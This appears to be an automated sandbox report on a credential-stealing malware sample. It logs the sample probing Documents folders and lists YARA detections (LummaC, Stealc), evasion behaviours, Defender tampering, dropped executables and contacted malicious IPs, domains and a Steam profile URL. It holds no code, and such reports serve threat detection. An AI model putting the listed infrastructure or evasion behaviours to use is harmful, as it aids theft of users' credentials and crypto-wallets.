Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\QVTVNIBKSD
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\UQMPCTZARJ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Directory queried: C:\Users\user\Documents
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2184520949.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2184690433.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2184807186.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2184381596.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 09d417a7c4.exe PID: 7836, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000D.00000003.2892795136.000000000189F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 29af563a7b.exe PID: 2792, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 09d417a7c4.exe PID: 7836, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 39.2.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RLX7QEJ1ATLQN8ECDIPHB.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.353ab0ae6e.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.SOZIL3CYM3GR68KV3Z4.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.353ab0ae6e.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.3142989520.0000000000771000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3147195806.000000000158E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2897071906.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3188496259.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2785659167.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3055944395.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898017549.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2316405109.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3041756077.0000000000F61000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2950368686.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2356707937.00000000000D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3191784603.0000000001717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2826208289.0000000000F61000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2877490551.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3039874893.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3096831716.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RLX7QEJ1ATLQN8ECDIPHB.exe PID: 2680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 353ab0ae6e.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541396 Sample: file.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 92 studennotediw.store 2->92 94 steamcommunity.com 2->94 96 26 other IPs or domains 2->96 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Antivirus detection for dropped file 2->118 120 16 other signatures 2->120 9 skotes.exe 4 25 2->9         started        14 file.exe 3 2->14         started        16 skotes.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49942, 49955, 49974 WHOLESALECONNECTIONSNL Portugal 9->106 78 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\...\29af563a7b.exe, PE32 9->80 dropped 82 C:\Users\user\AppData\...\353ab0ae6e.exe, PE32 9->82 dropped 90 5 other malicious files 9->90 dropped 164 Creates multiple autostart registry keys 9->164 166 Hides threads from debuggers 9->166 168 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->168 20 09d417a7c4.exe 9->20         started        24 353ab0ae6e.exe 9->24         started        26 29af563a7b.exe 9->26         started        28 num.exe 9->28         started        108 sergei-esenin.com 104.21.53.8, 443, 49707, 49708 CLOUDFLARENETUS United States 14->108 110 steamcommunity.com 104.102.49.254, 443, 49706, 49979 AKAMAI-ASUS United States 14->110 112 185.215.113.16, 49725, 49959, 49981 WHOLESALECONNECTIONSNL Portugal 14->112 84 C:\Users\user\...\RLX7QEJ1ATLQN8ECDIPHB.exe, PE32 14->84 dropped 86 C:\Users\...\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, PE32 14->86 dropped 88 C:\Users\...\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe, PE32 14->88 dropped 170 Query firmware table information (likely to detect VMs) 14->170 172 Found many strings related to Crypto-Wallets (likely being stolen) 14->172 174 Tries to evade debugger and weak emulator (self modifying code) 14->174 178 3 other signatures 14->178 30 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe 4 14->30         started        32 A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe 9 1 14->32         started        34 RLX7QEJ1ATLQN8ECDIPHB.exe 13 14->34         started        176 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->176 37 firefox.exe 18->37         started        39 6 other processes 18->39 file6 signatures7 process8 dnsIp9 70 C:\Users\user\...\SOZIL3CYM3GR68KV3Z4.exe, PE32 20->70 dropped 72 C:\Users\user\...\RETV5V6Q4X285DV6.exe, PE32 20->72 dropped 74 C:\Users\user\...behaviorgraphKAQCOVK40X0NN7A.exe, PE32 20->74 dropped 122 Antivirus detection for dropped file 20->122 124 Multi AV Scanner detection for dropped file 20->124 126 Detected unpacking (changes PE section rights) 20->126 144 6 other signatures 20->144 41 SOZIL3CYM3GR68KV3Z4.exe 20->41         started        44 RETV5V6Q4X285DV6.exe 20->44         started        46 GKAQCOVK40X0NN7A.exe 20->46         started        146 3 other signatures 24->146 128 Binary is likely a compiled AutoIt script file 26->128 48 taskkill.exe 26->48         started        50 taskkill.exe 26->50         started        54 4 other processes 26->54 76 C:\Users\user\AppData\Local\...\skotes.exe, PE32 30->76 dropped 130 Machine Learning detection for dropped file 30->130 132 Tries to evade debugger and weak emulator (self modifying code) 30->132 134 Tries to detect virtualization through RDTSC time measurements 30->134 52 skotes.exe 30->52         started        136 Modifies windows update settings 32->136 138 Disables Windows Defender Tamper protection 32->138 140 Disable Windows Defender notifications (registry) 32->140 142 Disable Windows Defender real time protection (registry) 32->142 98 185.215.113.37, 49774, 50001, 80 WHOLESALECONNECTIONSNL Portugal 34->98 100 youtube.com 172.217.18.14 GOOGLEUS United States 37->100 102 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 37->102 104 5 other IPs or domains 37->104 56 2 other processes 37->56 58 5 other processes 39->58 file10 signatures11 process12 signatures13 148 Antivirus detection for dropped file 41->148 150 Multi AV Scanner detection for dropped file 41->150 152 Detected unpacking (changes PE section rights) 41->152 154 Tries to detect sandboxes / dynamic malware analysis system (registry check) 44->154 156 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 44->156 60 conhost.exe 48->60         started        62 conhost.exe 50->62         started        158 Machine Learning detection for dropped file 52->158 160 Tries to evade debugger and weak emulator (self modifying code) 52->160 162 Hides threads from debuggers 52->162 64 conhost.exe 54->64         started        66 conhost.exe 54->66         started        68 conhost.exe 54->68         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.18.14
 youtube.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
steamcommunity.com 104.102.49.254 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
sergei-esenin.com 104.21.53.8 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 172.217.18.14 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spirittunek.store unknown unknown
spocs.getpocket.com unknown unknown
licendfilteo.site unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
eaglepawnoy.store unknown unknown
bathdoomgaz.store unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
shavar.services.mozilla.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dissapoiznw.store true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
      		unknown